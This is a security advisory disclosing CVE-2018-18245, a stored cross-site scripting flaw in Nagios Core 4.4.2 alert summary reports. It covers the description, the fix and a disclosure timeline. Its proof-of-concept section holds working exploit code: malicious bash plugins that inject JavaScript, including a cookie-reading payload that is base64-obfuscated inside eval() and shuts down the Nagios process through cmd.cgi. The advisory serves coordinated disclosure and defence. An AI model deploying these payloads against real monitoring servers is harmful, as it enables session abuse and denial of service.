usd-2018-0026 | Nagios Core/4.4.2

Advisory ID: usd-2018-0026
CVE Number: CVE-2018-18245
Affected Product: Nagios Core
Affected Version: 4.4.2
Vulnerability Type: Cross-Site Scripting (XSS)
Security Risk: Medium
Vendor URL: https://www.nagios.com
Vendor Status: Not fixed

Description

A cross-site scripting (XSS) vulnerability has been discovered in Nagios Core. This vulnerability allows attackers to place malicious JavaScript code into the web frontend through manipulation of plugin output. In order to do this the attacker needs to be able to manipulate the output returned by nagios checks, e.g. by replacing a plugin on one of the monitored endpoints. Execution of the payload then requires that an authenticated user creates an alert summary report which contains the corresponding output.

Nagios Core is a platform for network and system monitoring. It provides a web application for administrators which displays the current status of the monitored entities. Nagios uses plugins executed by the central server and plugins executed on the monitored endpoints via the NRPE service. An attacker that controls one of those endpoints has the ability to either modify plugin output or to replace the plugins executed on those endpoints. Accordingly, attackers may be able to control what is displayed to authenticated users within the web application. Nagios takes care to properly encode plugin results in most places to prevent XSS attacks. However, in the case of alert summary reports the output is not encoded, enabling attacks against the web application and its users.

Proof of Concept

Simple PoC:
An attacker that controls one of systems monitored with NRPE replaces the check_load plugin by the following simple bash script:

#!/bin/bash
VERSION=1.0
VERBOSE=0
PROGNAME=`/usr/bin/basename $0`
PROGPATH=`echo $0 | /bin/sed -e 's,[\\/][^\\/][^\\/]*$,,'`
. $PROGPATH/utils.sh
echo -n "alert(document.cookie)"
exitCode=1
echo -n "Testoutput"
exit $exitCode

As soon as the results of the modified check show up in the nagios web interface the payload should be in place. Note: The check status (exitCode) may need to be changed (to either 1 or 2) to make sure that an alert for the current status will show up in the summary page. When a user now views an alert summary report at /nagios/cgi-bin/summary.cgi and creates a report that contains the manipulated check result the payload will be executed.

Denial of Service PoC: Nagios Process Shutdown A more interesting attack would be able to shut down the Nagios process on the central server. To achieve this, the following JavaScript code will be used:

function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/10.10.10.10\/nagios\/cgi-bin\/cmd.cgi", true);
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded");
xhr.withCredentials = true;
var cvalue = document.cookie.substring(10);
var body = "nagFormId="+cvalue;
body+="&cmd_typ=14&cmd_mod=2&btnSubmit=Commit";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest();

The above script extracts the HTTP value of the NagFormId cookie and places it into the nagFormId form variable. It then automatically sends a POST request to /nagios/cgi-bin/cmd.cgi with the cmd_typ=14 which causes the Nagios process to shut down. This functionality is available to users under the „Process Info“ navigation item. Note: The POST URL needs to point to the hostname or IP address of the actual Nagios server.

To prevent issues with semicolons in the JavaScript payload the JavaScript code is encoded with base64, wrapped with an eval() call and placed into the malicious plugin. The full PoC plugin then looks like this:

#!/bin/bash
VERSION=1.0
VERBOSE=0
PROGNAME=`/usr/bin/basename $0`
PROGPATH=`echo $0 | /bin/sed -e 's,[\\/][^\\/][^\\/]*$,,'`
. $PROGPATH/utils.sh
echo -n "eval(atob('ICBmdW5jdGlvbiBzdWJtaXRSZXF1ZXN0KCkKICAgICAgewoJICAgICAgICAgIHZhciB4aHIgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTsKCSAgICAgICAgICB4aHIub3BlbigiUE9TVCIsICJodHRwOlwvXC8xMC4xMC4xMC4xMFwvbmFnaW9zXC9jZ2ktYmluXC9jbWQuY2dpIiwgdHJ1ZSk7CgkgICAgICAgICAgeGhyLnNldFJlcXVlc3RIZWFkZXIoIkFjY2VwdCIsICJ0ZXh0XC9odG1sLGFwcGxpY2F0aW9uXC94aHRtbCt4bWwsYXBwbGljYXRpb25cL3htbDtxPTAuOSwqXC8qO3E9MC44Iik7CgkgICAgICAgICAgeGhyLnNldFJlcXVlc3RIZWFkZXIoIkFjY2VwdC1MYW5ndWFnZSIsICJlbi1VUyxlbjtxPTAuNSIpOwoJICAgICAgICAgIHhoci5zZXRSZXF1ZXN0SGVhZGVyKCJDb250ZW50LVR5cGUiLCAiYXBwbGljYXRpb25cL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCIpOwoJICAgICAgICAgIHhoci53aXRoQ3JlZGVudGlhbHMgPSB0cnVlOwoJICAJdmFyIGN2YWx1ZSA9IGRvY3VtZW50LmNvb2tpZS5zdWJzdHJpbmcoMTApOwoJICAgICAgICAgIHZhciBib2R5ID0gIm5hZ0Zvcm1JZD0iK2N2YWx1ZTsKCSAgCWJvZHkrPSImY21kX3R5cD0xNCZjbWRfbW9kPTImYnRuU3VibWl0PUNvbW1pdCI7CgkgICAgICAgICAgdmFyIGFCb2R5ID0gbmV3IFVpbnQ4QXJyYXkoYm9keS5sZW5ndGgpOwoJICAgICAgICAgIGZvciAodmFyIGkgPSAwOyBpIDwgYUJvZHkubGVuZ3RoOyBpKyspCgkJICAgICAgICAgICAgYUJvZHlbaV0gPSBib2R5LmNoYXJDb2RlQXQoaSk7IAoJICAgICAgICAgIHhoci5zZW5kKG5ldyBCbG9iKFthQm9keV0pKTsKCSAgICAgICAgfQogICAgICBzdWJtaXRSZXF1ZXN0KCk7Cg=='))"
exitCode=1
echo -n "Testoutput"
exit $exitCode

Fix

Encode output received from nagios plugins.
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

Timeline

  • 2018-09-11 first contact request via security@nagios.com
  • 2018-09-12 provided advisory via our secure transfer platform
  • 2018-10-12 received CVE ID and notified vendor about it
  • 2018-12-07 Security advisory released

Credits

This security vulnerabilities was found by Maximilian Boehner of usd AG.

ABOUT usd SECURITY ADVISORIES

In order to protect businesses against hackers and criminals, we always have to keep our skills and knowledge up to date. Thus, security research is just as important for our work as is building up a security community to promote the exchange of knowledge. After all, more security can only be achieved if many individuals take on the task.

Our CST Academy and our usd HeroLab are essential parts of our security mission. We share the knowledge we gain in our practical work and our research through training courses and publications. In this context, the usd HeroLab publishes a series of papers on new vulnerabilities and current security issues.

Always for the sake of our mission: „more security.“

to usd AG


In accordance with usd AG’s Responsible Disclosure Policy, all vendors have been notified of the existence of these vulnerabilities.

Disclaimer

The information provided in this security advisory is provided „as is“ and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible.